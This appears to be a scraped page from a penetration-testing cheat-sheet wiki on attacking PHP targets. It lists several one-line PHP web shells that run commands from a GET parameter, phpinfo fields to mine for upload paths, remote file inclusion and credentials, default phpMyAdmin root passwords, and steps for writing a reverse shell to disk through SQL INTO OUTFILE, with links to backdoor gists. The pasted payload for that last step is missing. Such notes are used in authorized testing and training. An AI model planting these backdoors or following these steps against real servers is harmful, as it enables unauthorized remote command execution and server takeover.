search

♦️PHP

hashtag
php

chevron-rightReverse Shellshashtag

shell_exec

<?php echo shell_exec($_GET['cmd']); ?>

exec

<?php echo exec($_GET['cmd']); ?>

system

<?php echo system($_GET['cmd']); ?>

pass-through

<?php echo passthru($_GET['cmd']); ?>

back-ticks

<?php echo `$_GET['cmd']`; ?>

URL-encoded

<?php echo shell_exec(urldecode($_GET['cmd'])); ?>

HTML-encoded

<?php echo htmlspecialchars(shell_exec($_GET['cmd'])); ?>

Input sanitization

<?php
$cmd = escapeshellcmd($_GET['cmd']);
echo shell_exec($cmd);
?>

chevron-rightPHPinfohashtag

  • file_upload ⇒ if open search for upload functionality & upload directory

  • DOCUMENT_ROOT ⇒ discloses uploaded files path

  • architecture ⇒ in order to upload reverse shell in window , we need architecture info

  • allow_url_include ⇒ if open , we can perform RFI

  • $_SERVER['AUTH_USER'] || $_SERVER['AUTH_PASSWORD'] ⇒ database credentials

hashtag
phpmyadmin

hashtag
Authentication

try default creds of phpmyadmin

username : root
password : [null]
username : root
password : password

hashtag
reverse shell upload

circle-info

To know where to upload reverse-shell , check the Documet_root in phpinfo DOCUMENT_ROOT C:/wamp/www

linux

window

If above payload does not work try these combination also :-

  1. single quote : php-rev_shell & single quote : into-outfile-path

  2. single quote : php-rev_shell & double quote : into-outfile-path

  3. double quote : php-rev_shell & single quote : into-outfile-path

  4. double quote : php-rev_shell & double quote : into-outfile-path

Links

https://gist.githubusercontent.com/sente/4dbb2b7bdda2647ba80b/raw/31218294e74361df73215b44a219af3b95945618/Simple-Backdoor-One-Liner.phpgist.githubusercontent.comchevron-right
https://gist.githubusercontent.com/BababaBlue/71d85a7182993f6b4728c5d6a77e669f/raw/d1eedeea82b4f0890056ed87678cf3b015238936/gistfile1.txtgist.githubusercontent.comchevron-right
PreviousVulnerabilitiesNextwordpress

Last updated